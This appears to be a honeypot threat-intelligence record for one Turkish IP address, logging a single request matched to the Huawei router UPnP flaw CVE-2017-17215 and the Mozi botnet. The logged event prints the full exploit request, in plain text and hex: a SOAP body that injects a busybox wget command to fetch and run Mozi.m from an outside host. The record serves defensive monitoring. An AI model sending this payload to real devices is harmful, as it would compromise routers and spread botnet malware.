{"ip":"5.26.195.93","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":null,"why":["1 event(s), fewer than 10 distinct ports, no exploit payloads.","Not in any known-scanner range."]},"first_seen":"2026-05-25T06:42:22","last_seen":"2026-05-25T06:42:22","events_24h":0,"events_7d":0,"geo":{"country_code":"TR","country_name":"Türkiye","region":"Manisa","city":"Magnesia ad Sipylum","lat":38.5871,"lon":27.6406,"asn":16135,"org":"Turkcell Iletisim Hizmetleri A.s."},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2017-17215","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1"}],"malware":[],"top_ports":[{"port":37215,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0400_829cc7acbb47"]},"fingerprint_peers":{"po11nn0400_829cc7acbb47":18},"user_agents":[],"timeline":[{"date":"2026-05-25","count":1}],"recent_events":[{"timestamp":"2026-05-25T06:42:22","port":37215,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"authorization\":\"Digest username=\\\"dslf-config\\\", realm=\\\"HuaweiHomeGateway\\\", nonce=\\\"88645cefb1f9ede0e336e3569d75ee30\\\", uri=\\\"/ctrlt/DeviceUpgrade_1\\\", response=\\\"3612f843a42db38f48f59d2a3597e19c\\\", algorithm=\\\"MD5\\\", qop=\\\"auth\\\", nc=00000001, cnonce=\\\"248d1a2560100669\\\"\",\"connection\":\"keep-alive\",\"content-length\":\"601\",\"host\":\"<HONEYPOT>:37215\"}","body":"<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 5.26.195.93:38994 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/ctrlt/DeviceUpgrade_1","summary":"","payload_hex":"504f5354202f6374726c742f446576696365557067726164655f3120485454502f312e310d0a486f73743a20<HONEYPOT>3a33373231350d0a436f6e74656e742d4c656e6774683a203630310d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a417574686f72697a6174696f6e3a2044696765737420757365726e616d653d2264736c662d636f6e666967222c207265616c6d3d22487561776569486f6d6547617465776179222c206e6f6e63653d223838363435636566623166396564653065333336653335363964373565653330222c207572693d222f6374726c742f446576696365557067726164655f31222c20726573706f6e73653d223336313266383433613432646233386634386635396432613335393765313963222c20616c676f726974686d3d224d4435222c20716f703d2261757468222c206e633d30303030303030312c20636e6f6e63653d2232343864316132353630313030363639220d0a0d0a3c3f786d6c2076657273696f6e3d22312e3022203f3e3c733a456e76656c6f706520786d6c6e733a733d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220733a656e636f64696e675374796c653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f223e3c733a426f64793e3c753a5570677261646520786d6c6e733a753d2275726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e505050436f6e6e656374696f6e3a31223e3c4e657753746174757355524c3e24282f62696e2f62757379626f782077676574202d6720352e32362e3139352e39333a3338393934202d6c202f746d702f687561776569202d72202f4d6f7a692e6d3b63686d6f64202d78206875617765693b2f746d702f68756177656920687561776569293c2f4e657753746174757355524c3e3c4e6577446f776e6c6f616455524c3e24286563686f2048554157454955504e50293c2f4e6577446f776e6c6f616455524c3e3c2f753a557067726164653e3c2f733a426f64793e3c2f733a456e76656c6f70653e","method":"POST","user_agent":"","community_id":"1:sAj2UBTX3VA+cfVzThP0X/4JumE=","ja3":"","session":"316e847a-26dd-46e7-be2a-c7b938074fd8","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0}],"http_methods":[{"method":"POST","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/ctrlt/DeviceUpgrade_1","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Authorization","Connection","Content-Length","Host"],"representative":[{"name":"Authorization","value":"Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"","notable":true},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"601","notable":false},{"name":"Host","value":"<HONEYPOT>:37215","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[{"tag_id":"CVE-2017-17215","tag_type":"cve","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1","reference_urls":[]}],"data_as_of":"2026-07-13T06:15:58.501134+00:00"}